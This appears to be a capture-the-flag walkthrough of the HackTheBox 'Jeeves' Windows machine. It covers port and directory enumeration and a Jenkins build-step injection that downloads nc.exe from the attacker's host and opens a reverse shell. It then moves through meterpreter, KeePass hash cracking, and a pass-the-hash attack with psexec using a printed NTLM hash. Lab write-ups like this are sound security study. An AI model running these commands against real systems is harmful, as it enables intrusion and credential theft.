Reconnaissance #Windows#
- We got port 135, 80, 445 open on the machine. Nmap scan reveals these
- On port 80 we got a web application running with a search option for articles :That was my initial impression
- Its running on windows 10 and the search option leads to an error page, surprisingly. Also it’s a SQL error.
- From the error page I can see get the server info
- I tried all the things from directory to host enumeration it all failed . The reason is I overlooked a port which is 50000. This port is also had a web page on it.
Enumeration#
- On fuzzing the directories I get a hit
ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://jeeves.htb:50000/FUZZ -t 60
- After accessing the directory I was so happy to see jenkins. Then I got access easily by injecting this following command to download nc from my my machine on the project build page.I have exploited jenkins multiple times in THM and HTB, It’s relatively easy to leverage jenkins for a foothold
Exploitation#
powershell -c "Invoke-WebRequest -Uri 'http://10.10.14.4:8000/nc.exe' -OutFile 'C:\Windows\Temp\good.exe'"
- Executed it using next build command
C:\\Windows\Temp\good.exe <ip> <port> -e cmd.executing
- Soon after getting user flag I tried this
whoami /privand saw seimpersonate set enabled and tried some of the attacks from metasploit but failed. - Initially to transfer this shell to meterpreter I used
exploit/multi/script/web_discoveryfor the payloadwindows/meterpreter/reverse_tcpcause x64 was not working. - This above module helped me to create a meterpreter shell by presenting a command to paste in the shell session I had.
- Soon after executing the command I got meterpreter access.
- As I didn’t had any luck with potato attacks. I decided to check other directories and found a file in the Documents folder for this user. Which was
CEH.kdbd. - which is a keepass db file so typically this requires master key to unlock it.
- I used john to generate hash and then hashcat to crack it.
keepass2john CEH.kdbd >> kdbd.hash
- Then cracked the generated hash using hashcat
hashcat kdbd.hash /usr/share/wordlists/rockyou.txt --user -m 13400
- I used
--userflag as hash had a usernameCEH. - I got the password which is
<Redacted>
- I opened the db using
kpcli --kdb CEH.kdbxand provided master password when it prompted
- Only a password hash seemed interesting to me
Privilege Escalation#
- I checked the hash’s sanity as Administrator to machine’s share using crackmapexec and it was a success
crackmapexec smb 10.10.10.63 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
- Now using psexec.py I initiated pass the hash attack to get a shell
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 administrator@10.10.10.63 cmd.exe
- Administrator’s Desktop folder had this
hm.txtwhich said to look elsewhere for the root flag but by issuingdir /RI got to see the alternate data streams for the files.
- To read the contents of the root flag I typed
more < hm.txt:root.txt
